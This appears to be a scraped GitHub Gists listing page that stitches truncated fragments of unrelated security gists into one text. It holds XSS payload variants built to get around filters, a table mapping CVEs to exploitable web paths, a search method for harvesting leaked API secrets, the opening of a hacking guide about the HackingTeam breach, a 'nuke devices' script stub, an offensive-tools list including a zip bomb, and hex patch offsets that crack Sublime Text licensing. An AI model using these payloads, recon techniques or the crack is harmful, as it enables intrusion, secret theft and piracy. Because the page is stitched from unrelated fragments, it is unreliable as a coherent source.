
nmsr samidunimsara

@airborne-commando
airborne-commando / nuke.sh
Last active December 25, 2025 12:43
nuke devices
#!/bin/bash
# Check if the script is run as root
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root. Please use sudo or run as root."
exit 1
fi
# Function to install packages based on the distribution
install_packages() {
@bobby2000-github
bobby2000-github / gist-Phineas Fisher - Whistle-blowers.txt
Last active December 17, 2023 12:26
English translation version of Phineas Fisher's account of how he took down HackingTeam
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide for those without the patience to wait for whistleblowers
--[ 1 ]-- Introduction

GitHub Search Syntax for Finding API Keys/Secrets/Tokens

As a security professional, it is important to conduct a thorough reconnaissance. With the increasing use of APIs nowadays, it has become paramount to keep access tokens and other API-related secrets secure in order to prevent leaks. However, despite technological advances, human error remains a factor, and many developers still unknowingly hardcode their API secrets into source code and commit them to public repositories. GitHub, being a widely popular platform for public code repositories, may inadvertently host such leaked secrets. To help identify these vulnerabilities, I have created a comprehensive search list using powerful search syntax that enables the search of thousands of leaked keys and secrets in a single search.

Search Syntax:

(path:*.{File_extension1} OR path:*.{File_extension-N}) AND ({Keyname1} OR {Keyname-N}) AND (({Signature/pattern1} OR {Signature/pattern-N}) AND ({PlatformTag1} OR {PlatformTag-N}))

Examples:

**1.

My Resources and Links over time to various Tools, Notes, Videos, Papers, Articles, Writeups, and more. Will be moving to my own private hosted Wikipedia soon. Ascii Art Font: Calvin S
╔╦╗╦ ╦ ╔╗ ┬ ┬┌─┐ ╔╗ ┌─┐┬ ┬┌┐┌┬┐┬ ┬ ╦═╗┌─┐┌─┐┌─┐┬ ┬┬─┐┌─┐┌─┐┌─┐
║║║╚╦╝ ╠╩╗│ ││ ┬ ╠╩╗│ ││ │││││ └┬┘ ╠╦╝├─ └─┐│ ││ │├┬┘│ ├─ └─┐
╩ ╩ ╩ ╚═╝└─┘└─┘ ╚═╝└─┘└─┘┘└┘┴ ┴ ╩╚═└─┘└─┘└─┘└─┘┴└─└─┘└─┘└─┘
//
()==========>>======================================--
\\
https://doepichack.com/
@kafkaesqu3
kafkaesqu3 / exploitable_webpaths.md
Last active October 8, 2025 15:50
easy wins - exploitable/leaky web paths
| Exploit/description | Path |
| --- | --- |
| Microsoft Office Online Server SSRF (relay) | /op/view.aspx |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.Ui.WebResource.axd?type=rau |
| CVE-2017-11317 CVE-2019-18935 | /Telerik.Web.UI.DialogHandler.aspx |
| CVE-2020-17519 | /jobmanager/logs/ |
| CVE-2017-7615 | /verify.php?id=1&confirm_hash= |
| CVE-2018-1000130 | /jolokia |
| CVE-2018-1000130 | /actuator/jolokia |
| leak | /actuator/env |
@yassineaboukir
yassineaboukir / alert.js
Created March 24, 2021 14:08 — forked from tomnomnom/alert.js
Ways to alert(document.domain)
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active December 12, 2025 15:21
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
0d1n|210.78028eb|Web security tool to make fuzzing at HTTP inputs, made in C with libCurl.| blackarch-webapp |https://github.com/CoolerVoid/0d1n
0trace|1.5|A hop enumeration tool.| blackarch-scanner |http://jon.oberheide.org/0trace/
3proxy|0.8.13|Tiny free proxy server.| blackarch-proxy |http://3proxy.ru/
3proxy-win32|0.8.13|Tiny free proxy server.| blackarch-windows |http://3proxy.ru/
42zip|42|Recursive Zip archive bomb.| blackarch-dos |http://blog.fefe.de/?ts=b6cea88d
a2sv|135.973ba13|Auto Scanning to SSL Vulnerability.| blackarch-scanner |https://github.com/hahwul/a2sv
abcd|4.2738809|ActionScript ByteCode Disassembler.| blackarch-disassembler |https://github.com/MITRECND/abcd
abuse-ssl-bypass-waf|5.3ffd16a|Bypassing WAF by abusing SSL/TLS Ciphers.| blackarch-webapp |https://github.com/LandGrey/abuse-ssl-bypass-waf
acccheck|0.2.1|A password dictionary attack tool that targets windows authentication via the SMB protocol.| blackarch-cracker |http://labs.portcullis.co.uk/tools/acccheck/
ace|1.10|Automated Corp
@JerryLokjianming
JerryLokjianming / Crack Sublime Text Windows and Linux.md
Last active December 29, 2025 04:03
Crack Sublime Text 3.2.2 Build 3211 and Sublime Text 4 Alpha 4098 with Hex

How to Crack Sublime Text 3.2.2 Build 3211 with Hex Editor (Windows | Without License) ↓

  1. Download & Install Sublime Text 3.2.2 Build 3211
  2. Visit https://hexed.it/
  3. Open file select sublime_text.exe
  4. Offset 0x8545: Original 84 -> 85
  5. Offset 0x08FF19: Original 75 -> EB
  6. Offset 0x1932C7: Original 75 -> 74 (remove UNREGISTERED in title bar, so no need to use a license)